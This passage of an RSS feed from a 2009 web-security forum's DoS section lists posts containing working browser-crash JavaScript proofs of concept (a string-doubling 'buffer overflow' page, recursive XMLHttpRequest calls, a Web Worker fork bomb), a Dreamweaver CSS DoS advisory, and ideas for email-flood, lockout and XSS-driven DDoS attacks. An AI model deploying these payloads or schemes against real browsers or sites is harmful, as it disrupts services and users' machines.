alert(&quot;G00d Bye!&quot;);<br />
var thxstaker=escape(c); // :) a little bit..<br />
alert(navigator.useragent);<br />
alert('...');<br />
alert('yes, the browser suck!')<br />
&lt;/script&gt;<br />
&lt;br&gt;<br />
Only For fun..<br />
&lt;br&gt;<br />
@ XaDoS August ~ 2009<br />
&lt;/html&gt;]]></description>
            <dc:creator>Pavlovrm</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 29 Aug 2009 22:36:48 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29695,29695#msg-29695</guid>
            <title>Does this code crash your Firefox? (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29695,29695#msg-29695</link>
            <description><![CDATA[I write a code; but for me work, for the pc of my friend no: why?<br />
<br />
tested on : WinXP Sp2 + Mozilla FIreFox 3.5.2 &lt;= WORK<br />
<br />
tested on: WinXP sp3 + MOzilla FIrefox 3.5 &lt;= not work<br />
<br />
it's true&gt;? test by yuorself<br />
<br />
code:<br />
<br />
<br />
&lt;html&gt;<br />
&lt;head&gt; <br />
&lt;title&gt; [~] bUt Work? MOzilla Firefox 3.5.2 &lt;= (char) Buffer Overflow crash exploit&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
var x=String.fromCharCode(120);<br />
var a=&quot;&quot;;<br />
var b=&quot;&quot;;<br />
for(i=0;i&lt;1024;i++)<br />
{a=a+x;}<br />
for(i=0;i&lt;1024;i++)<br />
{b=b+a;}<br />
var c=x;<br />
for(i=0;i&lt;27;i++) c += c;<br />
for(i=0;i&lt;88;i++) c += b;<br />
alert(&quot;G00d Bye!&quot;);<br />
var thxstaker=escape(c); // :) a little bit..<br />
alert(navigator.useragent);<br />
alert('...');<br />
alert('yes, the browser suck!')<br />
&lt;/script&gt;<br />
&lt;br&gt;<br />
Only For fun..<br />
&lt;br&gt;<br />
@ XaDoS August ~ 2009<br />
&lt;/html&gt;<br />
<br />
----------------]]></description>
            <dc:creator>XaDoS</dc:creator>
            <category>DoS</category>
            <pubDate>Wed, 19 Aug 2009 14:10:15 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29563,29563#msg-29563</guid>
            <title>Cycled XMLHttpRequest bug (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29563,29563#msg-29563</link>
            <description><![CDATA[I've found a bug with cycled asynchronous XMLHttp in different browsers. If you create html page with following code<br />
<pre class="bbcode">
&lt;html&gt;
	&lt;head&gt;
	&lt;script&gt;
		function getXmlHttp(){
		var xmlhttp;
		try {
		xmlhttp = new ActiveXObject(&quot;Msxml2.XMLHTTP&quot;);
		} catch (e) {
		try {
		xmlhttp = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);
		} catch (E) {
		xmlhttp = false;
		}
		}
		if (!xmlhttp &amp;&amp; typeof XMLHttpRequest!='undefined') {
		xmlhttp = new XMLHttpRequest();
		}
		return xmlhttp;
		}
	&lt;/script&gt;
	&lt;script&gt;
		function getXmlHttpHACK(){
		var xmlhttp = getXmlHttp()
		xmlhttp.open('GET', 'drupal', false);
		xmlhttp.send(null);
		if(xmlhttp.status == 404) {
		getXmlHttpHACK();
		}
		}
	&lt;/script&gt;
	&lt;script&gt;
		var xmlhttp = getXmlHttp()
		xmlhttp.open('GET', 'drupal', true);
		xmlhttp.onreadystatechange = function() {
		if (xmlhttp.readyState == 4) {
		if(xmlhttp.status == 404) {
		getXmlHttpHACK();
		}
		}
		};
		xmlhttp.send(null);
	&lt;/script&gt;
	&lt;/head&gt;
&lt;/html&gt;</pre>
and open it, you will see how different browsers begin to devour system resources.<br />
<br />
- Internet Explorer 7/8 shows a message &quot;Stack overflow at line:23&quot; and stop page loading<br />
- Firefox 3.5 and Chrome handles this correctly<br />
- Opera 10 crashes<br />
- Apple Safari hangs<br />
<br />
I'm not strong in browsers vulnerabilities so I want to know if this is a simple crash bug or it's Buffer Overflow which allows to run shell code]]></description>
            <dc:creator>p0dge</dc:creator>
            <category>DoS</category>
            <pubDate>Mon, 03 Aug 2009 04:23:38 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29252,29252#msg-29252</guid>
            <title>Forum DoS I thought up (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29252,29252#msg-29252</link>
            <description><![CDATA[One day while I had forgotten my password to a forum, I realized that many forums allow password recovery through email very easily (no captcha).  I was thinking, what if I wrote a POST script to send email recovery emails as fast as possible...  The server's mail service might clog up (maybe, I have no idea), but more importantly, after a while, the hosting company will suspend the forum's account for being &quot;spamers&quot;.<br />
To add some pizazz to this you can make an array of all the member names or emails and send password recovery to each one of them.  Gmail merges emails from the same recipient into one conversation, but I'm sure other mail services/clients would easily be spammed by this.<br />
<br />
I'll post some code later if I get any free time.]]></description>
            <dc:creator>flam</dc:creator>
            <category>DoS</category>
            <pubDate>Tue, 14 Jul 2009 16:31:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29227,29227#msg-29227</guid>
            <title>Iran - firewalls - government ip collection - Dos attacks - RSnake (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29227,29227#msg-29227</link>
            <description><![CDATA[I don't write politely I write fast, or I try to.<br />
<br />
slowloris is a program to initiate a sophisticated DoS attack using low bandwidth, intensive job scheduling to keep a server busy.<br />
<br />
It is being used by hackers (or just computer savvy activists) against Iranian government websites that, for example, display pictures of protestors and ask for anonymous information about their identity. To be used by government forces for arrests or who knows what.<br />
<br />
One such group of computer hacky activists, which has been making use of slowloris and pyloris, is called anonymous/whyweprotest. They're &quot;causes&quot; are plural and probably irritating to some (certainly to me). <br />
However those causes include what seems a noble effort to protect iranian protestors by using slowloris as mentioned.<br />
<br />
<br />
Just for reference, I give the two relevant links:<br />
<br />
http://ha.ckers.org/blog/20090617/slowloris-http-dos/<br />
<br />
http://iran.whyweprotest.net/keeping-your-anonymity-iran/2214-iranian-web-site-identifies-protesters.html<br />
<br />
 Just FYI.]]></description>
            <dc:creator>irie</dc:creator>
            <category>DoS</category>
            <pubDate>Mon, 13 Jul 2009 10:16:42 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29201,29201#msg-29201</guid>
            <title>Javascript threads (FF3.5) (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29201,29201#msg-29201</link>
            <description><![CDATA[I'm rather astounded that nobody mentioned the javascript threading which can be achieved with Firefox 3.5...<br />
<br />
I've conducted an experiment to test the DoSness of them, but it's rather inconclusive. I've managed to crash Firefox in a couple of instances, only when executing other activities in parallel with the thread &quot;bomber&quot;... as mentioned it didn't always work...<br />
<br />
Of course the memory usage skyrockets, and the CPU is always in the 98% (90% after closing the tab with the PoC as well), but I can't seem to make Firefox execute a seppuku move at will.<br />
<br />
Maybe fellow slackers will have a go at it, and find a way to maximize the memory usage for an instant pop :).<br />
<br />
The code I've used:<br />
index.html<br />
<pre class="bbcode">
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;ninja-thread&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;script type=&quot;text/javascript&quot;&gt;
    work = new Worker('work.js');
    work.onmessage = function(event) {
        document.title=event.data;
    }
    work.postMessage(1);
    &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
<br />
work.js<br />
<pre class="bbcode">
onmessage = function(event) {
    abc = [];
    for(i=0;i&lt;100;i++) {
        abc<i> = new Worker('work.js');
        abc<i>.onmessage = function(event) {
            postMessage(event.data);
        }
        abc<i>.postMessage(event.data+1);
    }
    postMessage(event.data+1)
}
</i></i></i></pre>]]></description>
            <dc:creator>backbone</dc:creator>
            <category>DoS</category>
            <pubDate>Mon, 13 Jul 2009 10:17:58 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29148,29148#msg-29148</guid>
            <title>Newbie alert - What can a hacker find from an uploaded file? (5 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29148,29148#msg-29148</link>
            <description><![CDATA[Hi guys!<br />
<br />
I'm a total newbie to the whole web hacking situation!<br />
I'm writing an IIS based webapp, which will enable primary schools in the UK to upload and analyse pupil (student) performance throughout the year. <br />
Initially I would like to try to set this up with using SSL, really just to enable a couple of schools to trial it while I tweak the app etc.<br />
<br />
Anyhow, my question is, if a hacker was to intercept one of the plain text files being uploaded, what other info could they potentially find during the 'interception'.<br />
<br />
The actual text file itself would only hold things such as:<br />
an ID for the student which is internal to the school<br />
the pupil's name<br />
the subject (Maths etc)<br />
The grade/level acheived<br />
<br />
Just to provide a little more info, the user will have already logged in prior to uploading the file. Their username and a 20-digit 'security code' assigned during login are stored in a cookie, as well as that same info stored in a server side token. Use of the different pages of the application are only allowed if the cookie info matches the server token and this information isn't sent during the upload process (or at least, not intentionally). <br />
<br />
I guess what I'm asking is, if a hacker intercepted this text file, would they automatically be privvy to other information like the cookie/token?<br />
<br />
I'm making the assumption at this point that the hacker hasn't directly targetted the web server, but has somehow simply intercepted the text file being uploaded.<br />
<br />
Again, I will point out I am a total newbie to hacking processes and capabilities and would really appreciate any guidance given. If you need more info then I'll try to supply it.<br />
<br />
Thanks in advance - I'll go back to reading all these very interesting posts!<br />
<br />
J]]></description>
            <dc:creator>JonW215</dc:creator>
            <category>DoS</category>
            <pubDate>Fri, 10 Jul 2009 09:48:42 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,28027,28027#msg-28027</guid>
            <title>new type of ddos? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,28027,28027#msg-28027</link>
            <description><![CDATA[hi there ;).. <br />
<br />
i was thinking about a new dos/ddos type.. <br />
as there are many site that have an login system that when you enter<br />
the wrong password like 3 to xxx times you  can't login for xxx minuts/hours/days.<br />
<br />
anyway you get my point.. well then if there is a hole/bug on a public place where you can input precisting xss the best place would be the home pages<br />
<br />
you can generate wrong login sessions for every visitor. so if some one want to login it says to manny tries. anyway that way you can dissable there service<br />
as every service wich requers login is started with logging in so everything malfunctions.<br />
<br />
ofc this sould be examen.<br />
<br />
anyway actually my question is what do you guys think of this?]]></description>
            <dc:creator>SpoofGhost</dc:creator>
            <category>DoS</category>
            <pubDate>Fri, 08 May 2009 16:51:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,27816,27816#msg-27816</guid>
            <title>Adobe Dreamweaver CS3 Denial of Service (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,27816,27816#msg-27816</link>
            <description><![CDATA[|| Security Net Advisory #D.02.20.09.a<br />
<br />
Title :  Adobe Dreamweaver CS3 Denial of Service<br />
Impact : DoS<br />
Type : From remote<br />
Vendor :<br />
- Url : http://www.adobe.com/<br />
<br />
|| Vulnerability<br />
<br />
Engine for parsing remote CSS files are vulnerable to DoS attacks. Successful exploatation requires from user to include special .css file from remote web site.<br />
<br />
|| POC<br />
<br />
--- tmpl01.dwbug.php ---<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;link href=&quot;http://security-net.biz/test.css&quot; rel=&quot;stylesheet&quot; type=&quot;text/css&quot; /&gt; <br />
&lt;/head&gt;<br />
&lt;body&gt; &lt;/body&gt;<br />
&lt;/html&gt;<br />
------------------------------<br />
<br />
File test.css must begin with hex value: 0a, for successful exploatation.<br />
<br />
|| Solution:<br />
<br />
Upgrade to newest version.<br />
<br />
|| Contact<br />
<br />
Author : Ivan Markovic, Network Security Solutions<br />
Original advisory: http://security-net.biz/wsw/index.php?p=259&amp;n=190]]></description>
            <dc:creator>Ivan</dc:creator>
            <category>DoS</category>
            <pubDate>Thu, 23 Apr 2009 09:42:22 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,27541,27541#msg-27541</guid>
            <title>File Upload issue (9 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,27541,27541#msg-27541</link>
            <description><![CDATA[Hi,<br />
<br />
I was sizing up one of the very underestimated risk associated with the 'upload' feature in applications of different platforms. To elucidate, let me give you an example:<br />
<br />
An application has an upload feature which allows files no bigger than 2MB. Now if you try to upload a file bigger than that, it will exhibit a message saying 'not allowed to upload big files'. Now if you analyze the server carefully, you will see the whole file gets uploaded to the Temporary folder first and then it will check if it is bigger than 2 MB. Following that if a malicious user automate this process and submit multiple requests (in thousands or more), that can be a possible cause of DoS as the server space will be occupied.<br />
<br />
My question is how to mitigate this. Any thoughts?]]></description>
            <dc:creator>gunwant_s</dc:creator>
            <category>DoS</category>
            <pubDate>Tue, 21 Apr 2009 11:24:33 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,27342,27342#msg-27342</guid>
            <title>ddosing with xss? (13 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,27342,27342#msg-27342</link>
            <description><![CDATA[hi there just a quick quistion wich concerns also xss<br />
<br />
well if you got an xss bug like when u post your code on a guestbook so that if some one visit that page it will fire your code is it possible to create a ddos attack with this like a bot net? <br />
<br />
as an example i post some code on a guest book with an iframe wich loads a pecific site in it without the visitor in quistion you actually send data to that server so if you do this with loads of people that visit that guest book<br />
<br />
is it possible to take down a site or so?]]></description>
            <dc:creator>SpoofGhost</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 11 Apr 2009 06:08:10 -0500</pubDate>
        </item>
    </channel>
</rss>
